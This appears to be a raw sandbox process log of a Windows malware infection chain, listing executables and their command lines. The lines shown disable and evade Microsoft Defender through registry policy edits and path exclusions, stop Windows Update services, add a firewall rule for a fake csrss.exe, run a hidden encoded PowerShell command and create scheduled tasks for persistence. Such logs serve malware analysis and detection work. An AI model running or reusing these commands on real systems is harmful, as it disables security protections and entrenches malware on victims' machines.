C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED00.tmp\ED10.tmp\ED11.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\3E1D.exe

C:\Users\Admin\AppData\Local\Temp\3E1D.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.exe

C:\Users\Admin\AppData\Local\Temp\3EE9.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4071.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\4322.exe

C:\Users\Admin\AppData\Local\Temp\4322.exe

C:\Users\Admin\AppData\Local\Temp\442C.exe

C:\Users\Admin\AppData\Local\Temp\442C.exe

C:\Users\Admin\AppData\Local\Temp\4612.exe

C:\Users\Admin\AppData\Local\Temp\4612.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\EAA0.exe

C:\Users\Admin\AppData\Local\Temp\EAA0.exe

C:\Users\Admin\AppData\Local\Temp\ED12.exe

C:\Users\Admin\AppData\Local\Temp\ED12.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\EFF1.exe

C:\Users\Admin\AppData\Local\Temp\EFF1.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zSF2C7.tmp\Install.exe

.\Install.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 756

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp" /SL4 $E0112 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gZKLshbed" /SC once /ST 03:36:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gZKLshbed"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\28C5.exe

C:\Users\Admin\AppData\Local\Temp\28C5.exe

C:\Users\Admin\AppData\Local\Temp\3028.exe

C:\Users\Admin\AppData\Local\Temp\3028.exe

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 68 -s 580

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gZKLshbed"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe\" 3Y /Tzsite_idQqV 385119 /S" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe 3Y /Tzsite_idQqV 385119 /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

